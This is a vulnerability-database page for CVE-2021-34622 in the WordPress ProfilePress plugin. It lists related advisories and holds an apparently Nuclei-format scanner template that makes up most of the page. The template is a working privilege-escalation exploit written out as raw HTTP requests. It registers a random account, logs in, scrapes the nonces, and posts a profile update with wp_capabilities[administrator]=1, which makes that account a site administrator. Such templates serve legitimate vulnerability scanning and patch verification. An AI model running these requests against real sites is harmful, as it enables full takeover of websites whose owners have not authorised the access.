| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2021-34622 | 5 Jul 202112:18 | – | circl | |
| WordPress 安全漏洞 | 7 Jul 202100:00 | – | cnnvd | |
| WordPress ProfilePress plugin elevation of privilege vulnerability | 9 Jul 202100:00 | – | cnvd | |
| CVE-2021-34622 | 7 Jul 202112:20 | – | cve | |
| CVE-2021-34622 ProfilePress 3.0 - 3.1.3 - Authenticated Privilege Escalation | 7 Jul 202112:20 | – | cvelist | |
| EUVD-2021-21272 | 7 Jul 202112:20 | – | euvd | |
| Critical vulnerabilities found in WordPress plugin affecting 400,000 sites. | 8 Jul 202115:12 | – | hivepro | |
| CVE-2021-34622 | 7 Jul 202113:15 | – | nvd | |
| WordPress ProfilePress Plugin 3.0.0 < 3.1.4 Multiple Vulnerabilities | 28 Sep 202100:00 | – | openvas | |
| CVE-2021-34622 | 7 Jul 202113:15 | – | osv |
id: CVE-2021-34622
info:
name: WordPress ProfilePress <= 3.1.3 - Privilege Escalation
author: Sourabh-Sahu
severity: critical
description: |
ProfilePress plugin before 3.1.4 allows privilege escalation. Due to insufficient validation in the profile update functionality, authenticated users can supply arbitrary usermeta fields, including `wp_capabilities`, during profile updates. This enables a user to escalate their privileges to administrator.
impact: |
Authenticated users can escalate their privileges to administrator by supplying arbitrary usermeta fields during profile updates, leading to complete WordPress site takeover.
remediation: |
Upgrade to ProfilePress version 3.1.4 or later.
reference:
- https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2021-34622
classification:
cve-id: CVE-2021-34622
epss-score: 0.0412
epss-percentile: 0.89571
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-269
cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: properfraction
product: profilepress
fofa-query: body="/wp-content/plugins/profilepress"
tags: cve,cve2021,wordpress,wp-plugin,wp,profilepress,privilege-escalation,authenticated,intrusive,vkev,vuln
variables:
username: "user_{{to_lower(rand_base(5))}}"
password: "pass_{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
firstname: "{{rand_base(5)}}"
lastname: "{{rand_base(5)}}"
boundary: "WebKitFormBoundarypRyCNwmSkLdfNd7E"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary={{boundary}}
Accept-Encoding: gzip
--{{boundary}}
Content-Disposition: form-data; name="reg_username"
{{username}}
--{{boundary}}
Content-Disposition: form-data; name="reg_email"
{{email}}
--{{boundary}}
Content-Disposition: form-data; name="reg_password"
{{password}}
--{{boundary}}
Content-Disposition: form-data; name="reg_password_present"
true
--{{boundary}}
Content-Disposition: form-data; name="reg_first_name"
{{firstname}}
--{{boundary}}
Content-Disposition: form-data; name="reg_last_name"
{{lastname}}
--{{boundary}}
Content-Disposition: form-data; name="action"
pp_ajax_signup
--{{boundary}}--
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=pp_ajax_login&data=login_username%3D{{username}}%26login_password%3D{{password}}%26login_form_id%3D1
- raw:
- |
GET /account/edit-profile/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: wpnonce
group: 1
regex:
- 'name="_wpnonce"\s+value="([^"]+)"'
- "name='_wpnonce'\\s+value='([^']+)'"
internal: true
- type: regex
name: nonce
group: 1
regex:
- '"nonce"\s*:\s*"([^"]+)"'
- 'pp_ajax_form\s*=\s*\{[^}]*"nonce"\s*:\s*"([^"]+)"'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary={{boundary}}
Accept-Encoding: gzip
--{{boundary}}
Content-Disposition: form-data; name="reg_username"
{{username}}
--{{boundary}}
Content-Disposition: form-data; name="eup_email"
{{email}}
--{{boundary}}
Content-Disposition: form-data; name="eup_first_name"
{{firstname}}
--{{boundary}}
Content-Disposition: form-data; name="eup_last_name"
{{lastname}}
--{{boundary}}
Content-Disposition: form-data; name="eup_display_name"
{{firstname}} {{lastname}}
--{{boundary}}
Content-Disposition: form-data; name="_wpnonce"
{{wpnonce}}
--{{boundary}}
Content-Disposition: form-data; name="nonce"
{{nonce}}
--{{boundary}}
Content-Disposition: form-data; name="ppmyac_form_action"
updateProfile
--{{boundary}}
Content-Disposition: form-data; name="action"
pp_ajax_editprofile
--{{boundary}}
Content-Disposition: form-data; name="is_melange"
true
--{{boundary}}
Content-Disposition: form-data; name="wp_capabilities[administrator]"
1
--{{boundary}}--
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'success":true'
- 'Account was updated successfully'
condition: or
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- 'email'
- 'username'
- 'password'
# digest: 4a0a0047304502201bf6f3c867d8b3617a1be04e69251d86450d309e082271351fad14e41e860b9f0221008faff11efd4cf5fdfdf754ccd15ce5d9a172be6ee3a17b011b45056007175b5c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation